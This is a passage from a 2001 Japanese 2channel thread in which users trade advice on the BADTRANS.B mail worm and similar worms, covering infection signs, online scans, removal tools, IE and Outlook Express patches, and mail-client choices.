普通なんのウィルスに感染したとか、どこのファイルが感染したとかでるじゃん。
それで、同じウィルスかどうかわかるんじゃないの?

ちなみに、バックアップを取っているんなら、おとなしく再インストールで良いと思うけど。ダメなのか?
366名無しさん@お腹いっぱい。:01/12/05 21:33
>>1にあるシマンテックのウィルスチェックって
何とかユーティリティをインストールするかって出るんだけど
インストールしないとウィルスチェック出来ないの?
>>366
>>6で触れている。
ActiveXのことでしょ?
368名無しさん@お腹いっぱい。:01/12/05 21:37
トレンドマイクロの方もインストールするかって出た。
これでチェックしてる人ってインストールしてるの?
>>368
ウイルスチェックするには必要なので、ダウンロードしてくだちい。
370345:01/12/05 22:05
>>356
確かにウィルス付きお礼メールもらっても萎えますなあ
僕も今度からレス不要と書きます。ありがとー
371354:01/12/05 22:06
↑は345でなく354でした
すんません
372ネット屋 ◆.t4dJfuU :01/12/05 22:19
>>359
ツール→インターネットオプション→セキュリティ→レベルのカスタマイズで、
ActiveXコントロールとプラグイン
ActiveXコントロールとプラグインの実行
有効にする
スクリプトを実行しても安全だとマークされていない・・・
無効にする
スクリプトを実行しても安全だとマークされている・・・
有効にする
署名済みActiveXコントロールのダウンロード
ダイアログを表示する
未署名のActiveXコントロールのダウンロード
無効にする
スクリプト
Javeアプレットのスクリプト
有効にする
アクティブスクリプト
有効にする
スクリプトによる貼り付け処理の許可
有効にする
になっていました、漏れのところでは。「中」にしてリセットしてみたら?
あるいは、検索のURLのクッキーを禁止にしていたり、信用しないことに
してたりしてないかしら?
>>361
Pocket Internet Explorer4かな?M$のサイトで触れられていないので、
情報の欠如ではありますが、仕組みがだいぶ違うので、大丈夫な気はします。
>>363
「BADTRANS.B」でしょうか?このスレに、「kernel32.000」が感染している
と言う人がいたような。幹線ファイル名はなんでしょうか?
皆さん、外国からやってきたメールはどうしてますか?
返信してます?
国外からメール来たのですが、偽装アドレスの一覧にそのアドレス
はありませんでした。実在するアドレスのようでした。
374ネット屋 ◆.t4dJfuU :01/12/05 22:29
http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=WORM_GONE.A
も「BADTRANS.B」に似てるナー。でもICQやらIRCでも病気を送るんだな。
でも、Kernel32.exeとかcp_25389.nls 、kdll.dll は同じ名前だから、
「BADTRANS.B」用のツールで駆除した場合、抜けが起こらんのかな?
同じだから大丈夫なのかな?
375名無しさん@お腹いっぱい。:01/12/05 22:36
ウィルススキャンやってみました、結果は大丈夫でした。わーい
>>374
今朝会社でそのウイルスの警告が来ましたよ。
ウチの会社には昨夜遅くから来始めたらしい。
377名無しさん@お腹いっぱい。:01/12/05 22:39
sp2にはBADTRANS.Bが流行る前からしてるんですけど、
これなら心配いりませんか?
378名無しさん@お腹いっぱい。:01/12/05 23:24
絶対安心というわけではない。
>>377
IEのSP2?
2kSP2だけだと、、、ダメ。
誰かさんと一緒(W
380名無しさん@お腹いっぱい。:01/12/05 23:38
2kにSP2あてたIE5.01SP2だと駄目なんだ?
381名無しさん@お腹いっぱい。:01/12/05 23:43
すまん、レス全部読まないで質問する。
「BADTRANS.B」って、HTMLファイルに埋め込まれている
スクリーンセイヴァー(?)ファイルが本体なんだよね?
テキストメールで見れない「Outlook Express」だと
十中八九死亡ということだよね。コワー…
「Becky」でよかったよ、ホント…
>380
ok。
3月に発見されてる外出ネタ、ちゃんと自分で調べるように。
>>381
違うワームと少し混同してると思われ。
スクリーンセーバー??>Gone
384383:01/12/05 23:49
漏れの勘違い。スマヌ
>383は無視して下され。>>381
385とろとろ ◆TORO/cjY :01/12/05 23:50
>>383
BadTransにも拡張子がふたつついてて、最後の拡張子が
スクリーンセーバーだったのもあったよ。
386381:01/12/05 23:56
実行形態は最後の拡張子で決まるんだよね。
最初の拡張子モドキはファイル名の一部と考えていいんだよね?
漏れに送られて来たのは「***.doc.scr」という感じだった。
スクリーンセイヴァーでウイルスって作れるん?
最後の拡張子は変化するん?
いづれにせよ、あの「いかにも」な拡張子のファイルが
ウイルスの類だったのは間違いない!
387名無しさん@お腹いっぱい。:01/12/06 00:10
アンチウイルスソフト使ってない人って多いんだな。
388ケニー・野村:01/12/06 00:12
詳細がわかりました。
389他板住民です:01/12/06 00:13
3日ほど前にRe.付メル受信(鬱

元々の装備(藁
IE5.5 SP2 &プロバでのウイルスチェックサービス

”message”は”CVDL W95/Badtrans.B”に感染していました。
ウィルスと一緒に”message”はファイルごと削除されました。

ってな感じで、感染はしてなかった模様・・・

しかし、今までセキュリティ関係は放置プレイしまくり状態だったので、
これを機に、http://housecall.antivirus.com/housecall/start_jp.asp
にて、オンラインスキャンをし、もちろん異常なかったけど、さらに
駆除ツール2つにもかけました・・・(FixBadtr.exeと3368Fix_BADT.EXE)
そして、"製品の更新"→"重要な更新"実行。
OEはその後プレビューしない設定にし、ノートン先生(IS2002)を導入。
さらに、MS01-055をダウソ&インスト。
http://www.sapporoworks.ne.jp/secure/
で、問題ない事を確認。(対策するまでは問題ありまくりだった)

この対策でとりあえず安心ですよね?
勿論不幸にも届いちゃったものをダブクリしないって事が前提で(藁

Badtrans.B以外の毒メルにもある程度大丈夫なんですかね?
GONEとか・・・
390ケニー・野村:01/12/06 00:16
今までウィルスなんて来たことないのに初めてきた人が多いのは
今回のウィルスはホームページ上のメールアドレスに反応して
過去に行ったことあるサイトのメアドにどっと送りつけるようです。

条件1
自分のHPもってて、メアド公開してる人で、しかもアクセス数が多い人はたくさん着ます。
吉野家のポエ山サイトも被害にあってるようです。

条件2
ヤフオクで商品を出展したことある人

の、ようです。
391名無しさん@お腹いっぱい。:01/12/06 00:20
質問。

既出だけど、メールチェックソフトを使うという手はありなのかな。
フリーのソフトを入れようと思ってるんだけど、サーバ上で確認すれば
ウィルスには感染しないんだよね?違ったかな。

ネット初めて1ヶ月。ちゃんとバッチ当ててアンチウィルスソフト入れてますが、
自パソに読み込む前に分かるなら、そっちの方がいいかな、と思いまして。
392ネット屋 ◆.t4dJfuU :01/12/06 00:22
>>379
え〜ん
>>389
良いプロバイダにご加入で。BADTRANS以外には「?」と考えておいた方が
無難です。それぞれの病気にそれぞれの対策が必要なので。
ただ、「GONE.A」はBADTRANSにとてもよく似ているので、削除してくれる
可能性も大きいですが、過信はしない方が良いかと。
393ネット屋 ◆.t4dJfuU :01/12/06 00:25
>>391
賢い選択だと思いますよ。
394381:01/12/06 00:27
>>387
その通り!
というか、プリインストール版が古くなったというだけ。
どっち道、同じことなんだけどね。
それでも、ウイルスマニア(コレクター)だと、
比較的冷静に対処出来るよ。
今のところ、被害には遭っていないよ。
でも、「HTMLに埋め込む」のだけはカンベンして欲しいなぁ。
毎回「view-source:http://......」じゃ面倒だからなぁ。
395名無しさん@お腹いっぱい。:01/12/06 00:31
すみません

病気のヤツに送る「いいかげん気付けよ!メール」の
テンプレートってどっかに無いですか?
396他板住民です(389):01/12/06 00:44
>ネット屋さん
早速のアドバイスどもです〜
当方打たれ弱いヘタレな雌(雌がヘタレという事ではない)なもんで、優しいレス嬉しいです。
やはり、他の毒メルの方は万全ではないって事なんですねぇ・・・
とりあえずノートン先生にがむばってもらうしか私にはどうにもこうにも・・・
このスレパート1から必死に読んで、さっきやっと追いついた所です。
しばらくここも巡回ポイントにしておこうと思っています。
よろしくお願いします。
397名無しさん@お腹いっぱい。:01/12/06 00:49
若干スレ違いかもしれませんが・・

ML(MLにもよるのかしれませんが)ですと、
MLに送信しないで 投稿した人に送られますね?
例:私が投稿したものを感染しているBさんが未読だとしたらBさんから私へ

MLへの投稿の形でウイルス付きが投げられるより被害はちいさいですが、
ご本人全く気づかずで これもまた困りものです。
技術系のML関係は来ませんが初心者の多いML関係は来まくりです。
サブジェクト Re:[****012345]****** みたいな感じで。
398名無しさん@お腹いっぱい。:01/12/06 00:51
391

>393
あ、大丈夫なんですね?
ありがとうございます。早速導入しますです。
>>394
仮にもウイルスマニアを自称するなら、
パターン更新・情報収集くらい、きちんとしなよ。
400394:01/12/06 02:03
やたー!肆百GETぉ〜!

>>399
よく言われる。

「リスクが伴うからパターン更新はしろ」ってね。
でも、金が。。。
アップデートするとバグが酷いし。。。
ま、まあ、感染しなきゃいいんだよね?

情報収集に関しては、最近飽き気味といったところか。。。
最近似たタイプのウイルスばっかでウンザリ。。。

やはり、言語をちゃんとやって
自作するのが一番面白いんだろうね。
Cから始めるのがいいのかな?
>>399
禿同。
特にアンチウイルス常駐切って色々いぢりたいウイルスウイルスマニアは、
いつ自爆しても良いようにちゃんとソレは実践汁。
常駐切り替え用の簡単レヂストリ値削除.vbsなんかデスクトップに置いて
る人は特に。。。
でも、マニアだけに収集が目的。本物書いちゃダメよ。
402400:01/12/06 02:20
>>401
収集ってキリが無いよね。
自作したら、ヲタク呼ばわりされるのかなぁ。。。
鬱ダ。。。
ノートンもオンラインスキャンやってたんだと思って実行したら
感染ファイルが・・・

I:\RECYCLER\S-1-5-21-448539723-113007714-1060284298-500\Di4.EXE は
次のウィルスに感染しています: W95.Hybris.worm
I:\katjusha_b12\kakikomi20.log は
次のウィルスに感染しています: W32.Nimda.A@mm(html)

と思ったけど安心した。
404aaaa:01/12/06 02:45
>>363
自己すれ。

WINMEだと、残ってしまうみたいで、
解決法は↓でした。
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=2186
405401:01/12/06 02:51
>>402
そりゃ、多種多様だしね。次から次からキリが無い。
というか、ウイルス集めてるだけで十分ヲタ(w
最初は、ウイルスデータベース調べるだけじゃ片手落ち、
本体落して常に自分で危険性認識しなきゃと思ってたけ
ど。。。。なんか本末転倒(w
今じゃ、すぐバグでて飽きないし対応ウイルス多いから
面白がってマイ糞製品使ってるようなもん。。
でも、そのお蔭でbadtrans別に脅威じゃ無いとも思える。
コレだけ騒がれるのが却って驚き。。
でもさ、書いてる奴こそ逆にちゃんと環境整えてるよ。

>>403
ゴミ箱は綺麗にね(w
406名無しさん@お腹いっぱい。:01/12/06 04:04
ちょっと質問させてください。
私はネスケユーザーでMessengerをメールソフトに使ってるんですが、
先日、件名が「RE:(文字化け)」で中身は空のメールが来ました。
送信元が知り合いだったので聞いてみたら
「BADTRANS.Bに感染してしまった」と言われたんですが、
このメールには添付ファイルがありませんでした。
これは一体どういうことなのでしょうか?
407名無しさん@お腹いっぱい。:01/12/06 04:20
>>406
サーバがウイルス感知して消したんでは?
408名無しさん@お腹いっぱい。:01/12/06 04:22
>>406
[email protected]
ノートンが削除するから実態はわからないけど、本文にスク
リプトが書いてあるみたい。
[email protected]単独と、W32.Badtrans.B@mmと混合で来
る場合がある。

俺の所に来るのは、[email protected]関連が1/3はあるけ
ど、なんで話題にならないの?(最近この板読んでないけど)
ノートンの反応に色々なパターンがあってすごく不安...
[email protected]が来ると、タスクトレイにメールアイコ
ンがバグって並んでいく...
409名無しさん@お腹いっぱい。:01/12/06 04:31
スイマセン。全然関係ないんですけど、友達同士で遊びでdeepthroatで遊んでたんですけど
被害者側の方の駆除方法がわかりません。(始めて被害者側になったので)
トレンドマイクロで駆除ツールがあったから
2時間かけてやったんんですけど、本当にこれで大丈夫なんでしょうか?
なんか、自動で駆除してくれるはずのツールなのに、集めてたsub7とかは消えてないんです。
ついでに手動で駆除(削除?)したばあいは
HKEY_LOCAL_MACHINE\SOFTWERE\MAICROSOFT\WINDOWS\CURRENTVERSION\RUNの
中の何かを消さないといけないとかなんとか…??もーさっぱりわかりません
オンラインのウィルスチェックは全部大丈夫だったんですけど、なんかまだ不安です。
これに懲りて、もうイタヅラはやめようと思いました。(ToT)
誰か教えてください>優しいお兄様
410名無しさん@お腹いっぱい。:01/12/06 04:48
とぼけた質問かもしれませんがどなたか教えて下さい。
自分の所にウィルスつきメールがたくさん届きます。これは
ウィルスに感染している人が、誰かにメールを
送るとその人に、もう一通ウィルスのメールが届くって
事なんですか?それとも、送ってなくても
アドレス帳などに登録しているユーザーに送信されるのですか?
それとも、私が感染した人にメールを送ると、ウィルスメールとして
戻ってくるのですか??

今日、会社の社長からウィルスメールが届きました。
一つは教えてある私の私用アドレス、もう一つは教えていないはずの
私の私用アドレスに2通届きました。
メールのタイトルは、Reの後に文字化けで
(この文字化けは半月くらい前に会社のPCから送った
私のメールのタイトルっぽいもの)で送信されてきました。

それとも私が使ってる会社のパソコンが感染しているのか?と
思うのですが、送信者は私の会社のアドレスではないし・・。
でも、自分のPCだったら、教えていないアドレスも
知ってるアドレスも全部あるし・・。
でも感染されていないし・・。

送信されてくるウィルスの仕組みがいまいち
分りません。教えて下さい。
411406:01/12/06 04:49
>>407
サーバーが勝手に消してくれるものなんですか?
私のプロバイダには有料でメールのウイルスチェックをしてくれる
サービスがあるんですが、そのサービスには入ってません。
逆に言えば、金払ってない人のは何のチェックもしないよ。
ってことだと思ってたんですが。

>>408
[email protected]ってどんなのなんでしょう?
過去ログ見てもイマイチ分かりませんでした。
本文は空でした。何も無しです。

うーん。結局私は感染してないということでいいのでしょうか?
とぼけた答えかもしれませんが>>1のリンク先見てください。
不安であればこのスレだけでも読んでください。
興味があれば過去ログも見てください。
413名無しさん@お腹いっぱい。:01/12/06 05:04
412さんへ
はい。全部読んだんですよ。過去ログも
別スレも全部。でも、駆除方法とか削除のことが多く
質問させていただいた内容がなかなか見当たらなくて
書かせていただきましたのです。
不安というか、仕組みがいまいち分らないのです。
ホントにとぼけてて、すみません
414410 :01/12/06 05:08
↑これの続きです。
Reだけならまだしも、どうして私のところに
おくられてくるメールのタイトルは全て
Reの後に文字化けタイトルとか文字化けタイトルにBBと
つくのでしょうか。。本当に本当にとぼけた質問で
恐縮です。
415九州男 ◆8U2HuhRg :01/12/06 05:09
みんな少しはネットで検索しようよ。。。
リンク先もいっぱい貼ってあるのに。
416九州男 ◆8U2HuhRg :01/12/06 05:16
大体俺はMessengerなんてメールソフト知らんし。
417RR:01/12/06 05:21
知らない人から添付ファイル付きのウィルスが送られて来たと
メールがありました。

パソコンはIESP2で添付ファイルは一度も開けたこともないし

Windowsのシステムの
kernel32.exe
cp_25389.nls
kdll.dll

検索しましたがファイルはなし

もちろんオンラインスキャンでチェックしましたがウィルスはなし

発信元のアドレスは、他人の
アドレスを利用して送りつける場合もあるようです。

皆様もお気をつけを!

http://www2a.biglobe.ne.jp/~yama/supamu.html
>>414
セキュリティー以前に、インターネット、メールソフトの基本的なことまでは
ここではスレ違いです。

>>417
いまさら?ログも読まずに?.......で、なんか用?

>九州男
これ以上やってても、情報が埋まっていくだけなのでやめようよ、、、
おつかれさま〜♪
419名無しさん@お腹いっぱい。:01/12/06 05:32
>>249にあった
http://headlines.yahoo.co.jp/hl?a=20011204-00000004-wir-sci
> 「MS『アウトルック』を安全にする「無料パッチ」:誰も使わないのはなぜ?
> 米マイクロソフト社の『アウトルック』を、非常に安全性の高い電子メールソフ
> トに変身させる、無料ダウンロード可能なアップデート用パッチがある。しかしこ
> のパッチは、同社のウェブサイト上で1年以上も、事実上無視されるという憂き目に
> あっている。
>  最近のウイルス攻撃の多くには、電子メール以外の手段も使って感染を広めるワ
> ームが使われている。問題のパッチ『 http://office.microsoft.com/Downloads/2000/Out2ksec.aspx
> アウトルック・電子メール・セキュリティー・アップデート』(OESU)は、『バッド
> トランス・B』や『サーカム』(SirCam)など、たいていの悪意あるコードによる被害
> を防止、または大幅に減らすことができる。しかしこれは、ユーザーがこのパッチ
> をダウンロードし、インストールすればの話だ。
> (以下略)」


のOutlook2000 SR-1をうまく入れれないです
data1.msiを探すことができません
Outlook2000 SR-1自体は必要なんでしょうか?
420よっぽどやることないのかな:01/12/06 05:39
>418

過去ログ全部読むほど暇人で毎日来てないのよ
421名無しさん@お腹いっぱい。:01/12/06 05:50
>>419
CD-ROM
全部読まなきゃわからんバカっているの?
423419:01/12/06 05:54
>>421
CD-ROM???
すんません
もっと詳しく教えて下さい(´Д`)
>>419の引用してきたレスの引用元には、次の一文が含まれている。
>アップグレード用パッチをインストールするには、
>マイクロソフト・オフィスCDのプログラムファイルにアクセスする必要があるが、
>すぐにCDを見つけられなかったユーザーがいた。

・・・・・・・・・・・・・・・・・・・・・・・。
425名無しさん@お腹いっぱい。:01/12/06 06:11
>>422
......................(・∀・)イル!!
426419:01/12/06 06:20
>>424
>アップグレード用パッチをインストールするには、
>マイクロソフト・オフィスCDのプログラムファイルにアクセスする必要があるが、
>すぐにCDを見つけられなかったユーザーがいた。

てゆうかまさにコレなんです(゚д゚ )
428名無しさん@お腹いっぱい。:01/12/06 06:33
>>411
http://www.symantec.com/region/jp/sarcj/cgi-bin/virauto.cgi?vid=28116
情報がない...W32.Badtrans.B@mmの亜種なんだと思うんだけど

みんなの所には[email protected]は来てないの?
俺の所にはW32.Badtrans.B@mmに混じって1/3ぐらいの割合で来るんだけど...
>>417
INETD.EXE
KERN32.EXE
CP_23421.NLS

 のBADTRANS.Aだったりして。

 BADTRANS.Aは、送信済リストをつくらないので、感染PC同士で
ループ状態になりやすいため発見されやすいから蔓延しなかったっ
て記事で読んだのだが…。密かに流れてるのね。
>>422
全部読んでもわからん馬鹿もいるだろう。
>>429
バッドトランスAに遭遇しましたが発見し易い部類です。
が、プレビューしてしまいました。
432ネット屋 ◆.t4dJfuU :01/12/06 08:09
>>397
MLの設定でReply_toが設定されていれば、MLへの返送はML宛になります。
(Majordomoの場合)。それはMLの設定の問題ですね。
>>409
シマンテックの方の検出もやってみてください。
それと、わからないひとは、手で削除しようとせず、駆除ツールを使った
ほうが速くて安全で確実ですよ。
>>410,>>414
件名が「Subject: Virus Alert」
内容が「Have detected a virus (WORM_BADTRANS.B) in your mail traffic
on 12/01/2001 10:00:10 with an action delete.」みたいな感じだったら、
プロバイダがメール送受信プログラムに操作をして、ウィルスの送受信を
行わない対策を取ったものだと思います。
誰かがあなた宛に病気メールを送ってきたが、危ないので添付を切り捨てましたよ。
安心してね!って意味です。ご安心を。
件名はわたしのところに来ている病気メールも文字化けしています。
>>411
上記の通り、病気を切り捨ててくれるサーバもあるようです。
プロバイダに確認してみてはいかがでしょうか?
433ネット屋 ◆.t4dJfuU :01/12/06 08:16
>>404
ううぅ、やっと意味がわかった。>>7に激しくガイシュツのことかしら?(涙
434ネット屋 ◆.t4dJfuU :01/12/06 08:19
>>417
ううぅ。>>6に激しくガイシュツのことかしら?(涙
435名無しさん@お腹いっぱい。:01/12/06 09:57
うち、yahoo のフリーメールなんだけど、410さんと同じだよ。
Re: 文字化け :BB メールが届いた。2通も。
で、送信元の友人はアウトルックで感染。
でも、私の友人は私からウィルスメールは来てないとのこと。

送信元の友人のメールアドレスのはじめに_ が加えられていた。
2人から送られてきたのだけど、2つとも_がメルアドの最初に加えられていた。

添付ファイルもくっついていなかった。
本文空白。
やっぱ感染してないのかな。
昨晩、ウイルス感染のお知らせをした方からお礼のメールが
来ました。
その方はビッグローブユーザーで、メールセキュリティサービス
に入っていたにもかかわらず、サーバ側のソフトのパターン
ファイルが古かったために、Badtrans.B付きメールがサーバを
すり抜けてやってきて感染したようです。
サーバソフトも、クライアントと同じようにパターンファイルの更新
が必要なので、他ISPでもこのようなことがないとは限らないでしょ
う。
ISPのメールセキュリティオプションに加えてクライアントのアンチ
ウイルスソフトを購入して、2重3重の自衛策をとった方がいいかも
しれません。
437FromZtoA:01/12/06 10:07
あ〜ひまだ。おもしろいことでもないかな。
[email protected]にメール送っても無視するけど(藁
438名無しさん@お腹いっぱい。:01/12/06 11:09
435だけど、さっきオンラインチェックしたら検出されず。
父に聞いたらIE6.0だしSP2適用してた。。
なら、安心だ。
439  :01/12/06 11:11
>>438
まあ、大丈夫とは思うけどさあ、
> IE6.0だしSP2適用してた。。
6はとてもまだサービスパックが出る段階じゃないはず。
5.5とかにSP2当てていたのを6にした、とかかな?
440名無しさん@お腹いっぱい。:01/12/06 11:51
父が設定してるからなんともいえないけど、
多分こまめにバージョンアップしてたから
5.5にSP2当ててたのを6にしたんだと思うんだ。
441名無しさん@お腹いっぱい。:01/12/06 11:51
「ゴナー」(モナーじゃない)っていう新種が発見されたみたいだけど、
それってどんなのですか?
感染は防げるの?もし感染したら?
442ネット屋 ◆.t4dJfuU :01/12/06 11:54
>>441
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.goner.a%40mm.html
に既に駆除ツールも公開されています。
443441:01/12/06 12:00
>>442
うわ〜、早い!!
サンキュです。
444名無しさん@お腹いっぱい。:01/12/06 13:11
PWS-gen.Hooker って?
>>444
マカフィーを使っているとそんな名前で検出されるファイルがある。
ウイルスが生成したファイルね。
トレンドマイクロがBadtrans.B専用サイトを開設、だそうだ。
http://www.trendmicro.co.jp/badtrans/
447444:01/12/06 13:33
<a href="../test/read.cgi/sec/1007344514/445" target="_blank">
ありがとう♥<br>
ではこの送信者は・・・何のウィルスに感染したのでせう。。。(^。^;)
448444:01/12/06 13:34
ああ、初心者です↑(((((・・;)サササッ
449ネット屋 ◆.t4dJfuU :01/12/06 13:58
>>448
http://www.nai.com/japan/virusinfo/virB.asp?v=W32/Badtrans@MM
McAfeeでしか見かけませんが、「BADTRANS.B」の別名のようですね。
450名無しさん@お腹いっぱい。:01/12/06 14:06
すいません。
違う板でここで聞けっていわれたんですが、
IE5.5SP2を宛てても勝手に実行されるくさいです。

protocol.dll(でしたっけ?)などは出来てないのですが
添付ファイル名.virっていうのがディスク上に数個出来ています。

ちなみにアップグレードのときはきちんと標準インストールでした。
OSはNT40です。

誰か教えてください。
451ネット屋 ◆.t4dJfuU :01/12/06 14:10
>>450
NT4+IE5.5SP2で、OE上で「BADTRANS.B」ウィルスをプレビューすると、
と、言うことでしょうか?
何かメッセージが出ますか?
452 :01/12/06 14:34
IE5.01,SP2でもホットメール経由で開けて閉まったら終わりだった。
Outlook Exだとプイビュー表示しなければ、「Re:」で添付ファイルの
クリップマークがあるから分かるけど、このウイルスに感染した奴から
メール貰って、ホットメールで「non title」の表示で送り先が知り合いだったら
開けちゃうなぁ。開けてみて、このファイルを「Macafeでチェックする」とか出て
来ても、もうプレビュー状態じゃ遅せ〜よ。
>>450
ファイル名.vir ってのは、ノートンが検知してリネームしたファイルでは
ないかと。
ノートン使ってないですか?
>>450
ファイル名をちゃんと書け
455ネット屋 ◆.t4dJfuU :01/12/06 14:46
>>452
それはIE上でですか?OE上で?
456 :01/12/06 14:58
>>455
IE上ですよ。NIMUDAの時SP2に変更して安心していた。でも、
まさかホットメール経由でやられるとは!! ホットメールは
確か以前のVersionは表示にクリップファイル添付があると開ける前に
表示してあったと思うが、今は開けて添付ファイルがあると初めて分かる。
画面を表示して感染して、おまけに,pifとdocの拡張子のおまけ付きじゃ
ヤリ過ぎだよ。
457ななしこ:01/12/06 15:03
>>456
私もhotmailで受信したけど、プレビューしても平気でした。
SP2当ててるのならプレビュー=感染とはならないはず。
しかも添付ファイルをDLしようとしたら、Hotmailの
まかひーチェックがしっかりかかっており、DLできず。
OE宛てに転送して、しっかりゲットしたけどね(w
458ネット屋 ◆.t4dJfuU :01/12/06 15:05
>>456
ほぅほぅ。わたしはOutlookExpress上のHotmailアカウントで見てみましたが、
しっかり防御されていました。IE上ではだめなんですね。おそろしや。
ゆうべ、メール受信したらRe:のメールきたよ!
いきなり、ノートン先生が反応したからあせったよ!

送信者:ma****@zc4.so-net.ne.jp
>>459
Shinichiって人から来たよ!
461名無しさん@お腹いっぱい。:01/12/06 16:14
>>456
hotmailも恐ろしい仕様変更したもんだ。
しかし、SP2なら必ずダウンロードメッセージが現れるはずだが。
462ミッヒー ◆MIHI/3qc :01/12/06 16:24
So-netって、ウイルスメールブロックのオプションは提供して
ないんですね。
初心者の方が多そうだから、あった方がいいはずなのに。
463名無しさん@お腹いっぱい。:01/12/06 17:39
>>462
サーバに入れようとすると、費用がかかります。
サーバに負担もかかるから、そう簡単には入れられないみたい。

旧スレ上がってるからあげ
464名無しさん@お腹いっぱい。:01/12/06 17:41
もういい加減、IE使うの辞めろよ・・・
>>464
OEもね〜
466名無しさん@お腹いっぱい。:01/12/06 17:44
IE使ってたって感染しない奴はしない。
467名無しさん@お腹いっぱい。:01/12/06 17:44
>>451
ネット屋さんへ
たしかIE5 → 5.5SP2でした。
もしくは5.5 → 5.5SP2
ファイルを保存しますか?って言うのが出てきたと思います。
してないんですけど、これだけでは感染してないですか?
ファイル名.virって言うのはたしかInternetのキャッシュにあったと思います。
スキャンかけたら引っかかりました。

>>453
ノートンじゃなくてマカフィーかな?
Virus Scanって奴です。
この答え変ですか?
自分はEudoraProのメールソフトを使ってる。ちなみにブラウザはネスケ。

これを機会にIE使うの辞めましょう。
469名無しさん@お腹いっぱい。:01/12/06 17:54
初心者と自覚してる人ははIEとOEを使わないようにしましょう。
470名無しさん@お腹いっぱい。:01/12/06 17:58
移転して来ました。

私の友達がしっかり感染したのに、メール送られて来ない。。。
でも、見知らぬ所から 「感染したメールが送られて来た」 という
連絡のメールが来てるらしいので、感染したのは間違い無いんです。
実は友達は超初心者で、私もほとんど初心者なんです。
友達が感染後、イロイロなサイトをメールで教えたり、
ダウンロードしてもらったり オンラインチェックをしてもらったり
したんですが、どこにもウィルスが引っかからないらしんですが、
そんな事ありえませんよね?
私がパソコンを預かって見てみようかどうしようか迷ってるんですが
参考になるご意見が聞けたら嬉しいです。
又、言葉足らずだったらごめんなさい。
471九州男 ◆8U2HuhRg :01/12/06 18:01
>470
なんのウイルスか解らなければアドバイスしようが無い
472名無しさん@お腹いっぱい。:01/12/06 18:02
470です
BADTRANS.B です。
宜しくです!
パソコン預かる必要も無い。
EudoraとかBeckyは有料なのがむかつくな。
まあ無料メーラーもあるが。
475名無しさん@お腹いっぱい。:01/12/06 18:14
感染して無いならいいじゃないか
476名無しさん@お腹いっぱい。:01/12/06 18:15
無料メーラでいいのは?
477名無しさん@お腹いっぱい。:01/12/06 18:16
そりゃOEジャン。
478九州男 ◆8U2HuhRg :01/12/06 18:17
>472
何故Badtrans.Bと判断したのか?
>>474
金取るだけのことはある!と思わせるソフトはありますよ。
私は、Becky!は試用しはじめて3日後に金振り込みました。

自分にあったソフトを探してみて、価値があると思ったら
レジストしてください。

>>476
電信八号はどうですか?
480名無しさん@お腹いっぱい。:01/12/06 18:22
>>476
無料とは言わないけど
秀丸エディタに金払ってるなら
鶴亀メールというのを同じ作者が作ってます。
481名無しさん@お腹いっぱい。:01/12/06 18:22
Becky 4000円だもん。高すぎ。そんなに出すならアンチウイルスソフト買うよ。
メール読む、送信以外の機能なんていらないから使うならやっぱフリーだな。
482名無しさん@お腹いっぱい。:01/12/06 18:26
>>481
そりゃーそーだ。
483ネット屋 ◆.t4dJfuU :01/12/06 18:27
>>467
感染していないのでは?
その文言ではなく「ダウンロードしますか?」か、何かかも知れませんが、
キャンセルすれば大丈夫だと思います。.virはMcAfeeが作成するファイルのように
思います。
http://www.nai.com/japan/pqa/aMcAfeeVsc.asp?ancQno=VS01072508&ancProd=McAfeeVsc
484名無しさん@お腹いっぱい。:01/12/06 18:38
>470
あんたでは話にならんから本人出せ
初心者が伝聞を仲介すると、伝言ゲーム以上に難解な
文章のやりとりになる。
485ネット屋 ◆.t4dJfuU :01/12/06 18:44
>>472>>478

「友達がしっかり感染した」
「オンラインチェックをしたが引っかからない」
「BADTRANS.B です」(きっぱり

この矛盾した3つのセンテンスから推理推理。

なんとなくだが、こうではないだろうか?

「友達がしっかり感染した」の根拠は
「見知らぬ所から 「感染したメールが送られて来た」 という連絡のメールが来てる」ということ。

「BADTRANS.B です」とキッパリ言う根拠は、
見知らぬ所から来たメールにそう書かれている と推測。

で、推論を進めると、その見知らぬところからのメールと言うのは
件名が「Subject: Virus Alert」
内容が「Have detected a virus (WORM_BADTRANS.B) in your mail traffic
on 12/01/2001 10:00:10 with an action delete.」
なのではないだろうか。

それなら、>>329>>432にある通り、「あなた宛に病気が来たので安全のため添付は
捨てましたよ」と言うメールだから、感染してなくて当然と言う結果なんだけど、
違うかな?
486九州男 ◆8U2HuhRg :01/12/06 18:48
>485
納得・・・

英語位読んで欲しいもんだ。
まあ俺も読めんけど(w
487名無しさん@お腹いっぱい。:01/12/06 18:49
sesnaのフリー版はダメですかね? >メーラー
488九州男 ◆8U2HuhRg :01/12/06 18:59
>485

ちなみにエキサイトで翻訳してみた。

>行為を備えた12/01/2001 10:00:10の上のあなたのメイル交通の
>ウィルス(WORM_BADTRANS.B)を発見した、削除する。

こんな翻訳じゃ解らんな(w
489名無しさん@お腹いっぱい。:01/12/06 19:02
ネットスケープメッセンジャーが便利で使ってるんだけど、
メールを開いてから出ないと添付メールだとわからない・・・・。
設定でメールを開く前に添付ファイル付かわかるようにすること出来ないかな?
490ネット屋 ◆.t4dJfuU :01/12/06 19:13
>>488
日本語で送ってくれるプロバイダもあるみたいっすね。
2chのどっかで見かけたんだけど、わかんなくなってしまった。ウツ。
491ひよこ名無しさん:01/12/06 19:16
学生さんならAl−Mailは無償ですよ。
社会人でも2000円と良心的。
テキスト表示だし添付は自動的に展開できない。
最新版では添付のみ削除できるようになったらしいし。

電信8号も無料です。
メールサーバーに来ているメールを閲覧して
そこで任意に削除したり受信したりできるから便利です。
あなたのメールが"WORM_BADTRANS.B"に感染してたので、
12月1日の10時にそれを削除しました。
>>492
おしい
494ネット屋 ◆.t4dJfuU :01/12/06 19:25
>>492
それってプロバから来たものですか?それとも翻訳?
重要なのは、「あなたのメール」と言うのが、「あなたが出したメール」
なのか、「あなた宛のメール」なのかなんですよね。
確かに英文も単に「あなたのメール」としか書かれていない。
出るメールも入るメールも、どちらにも同じメッセージを
表示しているのでは?大事なことなのにナー。
495他板住民です(389):01/12/06 19:26
>ネット屋さん
>>389にも書きましたが、うちは日本語で来てましたよ。
(当方dion)
496:01/12/06 19:34
ワシAL-Mailだけど何か?
>>474
ほえ?
わたくしのユードラは無料です。スポンサーモードで。
WINDOWS2000でつことります。
498名無しさん@お腹いっぱい。:01/12/06 19:39
悩んだ>>329です。

>>494
